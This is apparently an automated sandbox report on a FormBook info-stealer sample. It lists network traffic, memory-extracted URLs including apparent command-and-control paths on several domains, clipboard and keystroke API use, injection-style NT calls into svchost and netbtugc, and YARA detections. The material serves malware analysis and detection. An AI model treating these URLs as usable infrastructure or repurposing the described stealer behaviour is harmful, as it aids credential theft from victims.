            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 09 Jun 2024 16:03:28 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000059A0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000049C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3854245040.0000000002A81000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b301.space
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3854245040.0000000002A81000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.b301.space/fo8o/
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000004EA2000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003EC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000004EA2000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003EC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000051C6000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000041E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://donnavariedades.com/fo8o?Zl4h1=l
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000004.00000003.1732654889.00000000083C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033W
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000004.00000002.3848803016.000000000354B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000004.00000002.3855652610.000000000485A000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000387A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi
            Source: netbtugc.exe, 00000004.00000002.3855652610.000000000485A000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000387A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdH
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000054EA000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.000000000450A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?Zl4h1=mxnR
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000036E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyM
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000004B7E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa
            Source: netbtugc.exe, 00000004.00000002.3855652610.0000000005B32000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004B52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.b301.space&amp;reg_source=parking_auto
            Source: hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000003B9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: netbtugc.exe, 00000004.00000002.3855652610.00000000059A0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3857668891.0000000006920000.00000004.00000800.00020000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.00000000049C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00AD425A
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00AD4458
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00AD425A
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AC0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00AC0219
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AECDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00AECDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: This is a third-party compiled AutoIt script.0_2_00A63B4C
            Source: opp46lGmxd.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: opp46lGmxd.exe, 00000000.00000000.1376522765.0000000000B15000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9fd3e593-d
            Source: opp46lGmxd.exe, 00000000.00000000.1376522765.0000000000B15000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_25659a58-f
            Source: opp46lGmxd.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fe594f84-f
            Source: opp46lGmxd.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_66686cff-3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A04340 NtSetContextThread,LdrInitializeThunk,4_2_03A04340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A04650 NtSuspendThread,LdrInitializeThunk,4_2_03A04650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03A02BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03A02BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03A02BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02B60 NtClose,LdrInitializeThunk,4_2_03A02B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02AF0 NtWriteFile,LdrInitializeThunk,4_2_03A02AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02AD0 NtReadFile,LdrInitializeThunk,4_2_03A02AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02FB0 NtResumeThread,LdrInitializeThunk,4_2_03A02FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02FE0 NtCreateFile,LdrInitializeThunk,4_2_03A02FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02F30 NtCreateSection,LdrInitializeThunk,4_2_03A02F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03A02E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03A02EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03A02DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02DD0 NtDelayExecution,LdrInitializeThunk,4_2_03A02DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03A02D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03A02D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03A02CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02C60 NtCreateKey,LdrInitializeThunk,4_2_03A02C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A02C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03A02C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A035C0 NtCreateMutant,LdrInitializeThunk,4_2_03A035C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03A039B0 NtGetContextThread,LdrInitializeThunk,4_2_03A039B0
